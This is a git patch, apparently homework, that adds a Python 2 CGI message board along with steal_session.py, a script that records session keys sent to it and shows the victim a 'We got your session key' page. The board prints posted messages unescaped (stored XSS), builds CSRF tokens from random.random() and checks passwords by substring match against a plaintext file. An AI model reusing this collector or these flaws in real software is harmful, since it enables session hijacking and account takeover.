From 24cd8bc11345395f1a0bb64d61e51e207d8b3ace Mon Sep 17 00:00:00 2001
From: 53hornet <53hornet@gmail.com>
Date: Sat, 2 Feb 2019 23:10:20 -0500
Subject: Init.

---
 hw4/cgi-bin/._board.py         | Bin 0 -> 355 bytes
 hw4/cgi-bin/._login.py         | Bin 0 -> 299 bytes
 hw4/cgi-bin/._logout.py        | Bin 0 -> 299 bytes
 hw4/cgi-bin/._output.py        | Bin 0 -> 299 bytes
 hw4/cgi-bin/._post.py          | Bin 0 -> 299 bytes
 hw4/cgi-bin/._steal_session.py | Bin 0 -> 299 bytes
 hw4/cgi-bin/board.py           |  21 +++++++++
 hw4/cgi-bin/login.py           |  39 +++++++++++++++++
 hw4/cgi-bin/logout.py          |  23 ++++++++++
 hw4/cgi-bin/output.py          |  97 +++++++++++++++++++++++++++++++++++++++++
 hw4/cgi-bin/post.py            |  39 +++++++++++++++++
 hw4/cgi-bin/steal_session.py   |  24 ++++++++++
 12 files changed, 243 insertions(+)
 create mode 100755 hw4/cgi-bin/._board.py
 create mode 100755 hw4/cgi-bin/._login.py
 create mode 100755 hw4/cgi-bin/._logout.py
 create mode 100755 hw4/cgi-bin/._output.py
 create mode 100755 hw4/cgi-bin/._post.py
 create mode 100755 hw4/cgi-bin/._steal_session.py
 create mode 100755 hw4/cgi-bin/board.py
 create mode 100755 hw4/cgi-bin/login.py
 create mode 100755 hw4/cgi-bin/logout.py
 create mode 100755 hw4/cgi-bin/output.py
 create mode 100755 hw4/cgi-bin/post.py
 create mode 100755 hw4/cgi-bin/steal_session.py

(limited to 'hw4/cgi-bin')

diff --git a/hw4/cgi-bin/._board.py b/hw4/cgi-bin/._board.py
new file mode 100755
index 0000000..ef20daa
Binary files /dev/null and b/hw4/cgi-bin/._board.py differ
diff --git a/hw4/cgi-bin/._login.py b/hw4/cgi-bin/._login.py
new file mode 100755
index 0000000..26100f6
Binary files /dev/null and b/hw4/cgi-bin/._login.py differ
diff --git a/hw4/cgi-bin/._logout.py b/hw4/cgi-bin/._logout.py
new file mode 100755
index 0000000..9d1f260
Binary files /dev/null and b/hw4/cgi-bin/._logout.py differ
diff --git a/hw4/cgi-bin/._output.py b/hw4/cgi-bin/._output.py
new file mode 100755
index 0000000..25267ab
Binary files /dev/null and b/hw4/cgi-bin/._output.py differ
diff --git a/hw4/cgi-bin/._post.py b/hw4/cgi-bin/._post.py
new file mode 100755
index 0000000..fc9cd5d
Binary files /dev/null and b/hw4/cgi-bin/._post.py differ
diff --git a/hw4/cgi-bin/._steal_session.py b/hw4/cgi-bin/._steal_session.py
new file mode 100755
index 0000000..69e619e
Binary files /dev/null and b/hw4/cgi-bin/._steal_session.py differ
diff --git a/hw4/cgi-bin/board.py b/hw4/cgi-bin/board.py
new file mode 100755
index 0000000..5ca8afc
--- /dev/null
+++ b/hw4/cgi-bin/board.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+cgitb.enable()		## allows for debugging errors from the cgi scripts in the browser
+
+from output import *
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET datas
+
+if not Login():
+    DisplayLogin()
+
+# if we get here, this is an authorized user, let's print the messages
+PrintMessages()
+
+exit(0)
diff --git a/hw4/cgi-bin/login.py b/hw4/cgi-bin/login.py
new file mode 100755
index 0000000..a308dde
--- /dev/null
+++ b/hw4/cgi-bin/login.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+import random
+
+from output import *
+
+cgitb.enable()		## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies
+form = cgi.FieldStorage() # for reading GET data
+
+login = form.getvalue('username')
+password  = form.getvalue('password')
+with open('users', 'r') as users:
+    s = users.read()
+    if s.find(login + ' ' + password) == -1:
+        ShowError()
+
+    # else set session id cookie and store it in the file!
+    s_id = uuid.uuid4().hex
+    cookie['session_id'] = s_id # login
+
+    # xss protection -- set session_id cookie to httpOnly
+    cookie['session_id']['httponly'] = '1'
+
+    with open("sessions", "a") as myfile:
+        # csrf protection -- session token construction
+        random.seed()
+        csrfToken = str(random.random())
+        myfile.write(s_id + ' ' + login + ' ' + csrfToken + '\n')
+
+    print cookie
+
+RedirectToBoard()
diff --git a/hw4/cgi-bin/logout.py b/hw4/cgi-bin/logout.py
new file mode 100755
index 0000000..9d64800
--- /dev/null
+++ b/hw4/cgi-bin/logout.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable()		## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET data
+
+message = form.getvalue('message')
+
+user = Login()
+if not user:
+    ShowError()
+    exit(0)
+
+RemoveAllUserSessions(user)
+RedirectToBoard()
diff --git a/hw4/cgi-bin/output.py b/hw4/cgi-bin/output.py
new file mode 100755
index 0000000..544ac60
--- /dev/null
+++ b/hw4/cgi-bin/output.py
@@ -0,0 +1,97 @@
+import os
+import re
+
+def DisplayLogin():
+    print 'Content-Type: text/html\n'
+    print '<html><body>'
+    print """
+    <div id="container">
+    <form action="login.py" method="get">
+    <label for="username">Username:</label>
+    <input type="text" id="username" name="username">
+    <label for="password">Password:</label>
+    <input type="password" id="password" name="password">
+    <div id="lower">
+    <input type="submit" value="Login">
+    </div><!--/ lower-->
+    </form>
+    </div>
+    """
+    print '</body></html>'
+    exit(0)
+
+def PrintMessages():
+    print 'Content-Type: text/html\n'
+    print '<html><body>'
+    
+    with open("messages", "r") as m_file:
+        s = m_file.read()
+        l = s.split('\n')
+        for i in l:
+            if len(i) == 0:
+                continue
+            i.replace('\\n','\n')
+            print i
+            print '<br><br>'
+        print """
+        <br><br>
+        <form action="post.py" method="post" style="display:inline">
+        <input type="hidden" name="csrfToken" value="""
+
+        # csrf protection -- session token sendoff
+        s_id = os.environ.get('HTTP_COOKIE').split('=')[1] # for reading cookies
+
+        with open('sessions', 'r') as s_file:
+            for line in s_file:
+                if s_id in line:
+                    print line.split()[2]
+
+        print """
+        <label for="message">Message:</label><br>
+        <textarea rows="4" cols="50" name="message"></textarea>
+        <br>
+        <input type="submit" value="Post"></form>
+        """
+        print """
+        <form action="logout.py" style="display:inline">
+            <input type="submit" value="Logout" />
+        </form>
+        """
+
+    print '</body></html>'
+
+def ShowError():
+    print 'Content-Type: text/html\n'
+    print '<html><body>'
+    print '<h2> Error ocured :P </h2>'
+    print '</body></html>'
+    exit(0)
+
+def Login():
+    cookie_string = os.environ.get('HTTP_COOKIE') # for reading cookies
+    g = re.search('session_id=(\w+)', cookie_string) # if g==None -- no cookie
+    if not g:
+        return False
+    with open('sessions', 'r') as s_file:
+        s = s_file.read()
+        sid = g.group(1)
+        g = re.search(sid + ' ' + '(\w+)', s)
+        if not g:
+            return False
+    return g.group(1)
+
+def RedirectToBoard():
+    #go back to board.py
+    print 'Content-Type: text/html\n'
+    print '<meta http-equiv="refresh" content="0; url=board.py" />'
+    exit(0)
+
+def RemoveAllUserSessions(user):
+    tmp = ''
+    f = open('sessions', 'r')
+    for line in f:
+        if user not in line:
+            tmp += line
+    f.close()
+    with open('sessions','w') as f:
+        f.write(tmp)
diff --git a/hw4/cgi-bin/post.py b/hw4/cgi-bin/post.py
new file mode 100755
index 0000000..2a0bf8c
--- /dev/null
+++ b/hw4/cgi-bin/post.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() # allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading POST data
+
+message = form.getvalue('message')
+
+user = Login()
+if not user:
+    ShowError()
+
+if message == None: # to prevent posting empty messages
+    RedirectToBoard()
+
+# csrf protection -- check for csrfToken
+csrfToken = form.getvalue('csrfToken')
+
+if csrfToken is None:
+    ShowError()
+
+with open('sessions', 'r') as s_file:
+    for line in s_file:
+        if user in line and not csrfToken in line:
+            ShowError()
+
+message = message.replace('\n','\n')
+with open('messages','a') as m:
+    m.write(user + ': ' + message + '\n')
+
+RedirectToBoard()
diff --git a/hw4/cgi-bin/steal_session.py b/hw4/cgi-bin/steal_session.py
new file mode 100755
index 0000000..df84de6
--- /dev/null
+++ b/hw4/cgi-bin/steal_session.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable()		## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET data
+
+session = form.getvalue('session')
+
+if session:
+    with open('stolen_sessions','a') as m:
+        m.write(session + '\n')
+
+#Send victim to homepage so they don't notice anything!
+print 'Content-Type: text/html\n'
+print '<html><body><p style="font-size:25px"><img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img> &nbsp; We got your session key &nbsp; <img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img></p></body></html>'
+exit(0)
-- 
cgit v1.2.3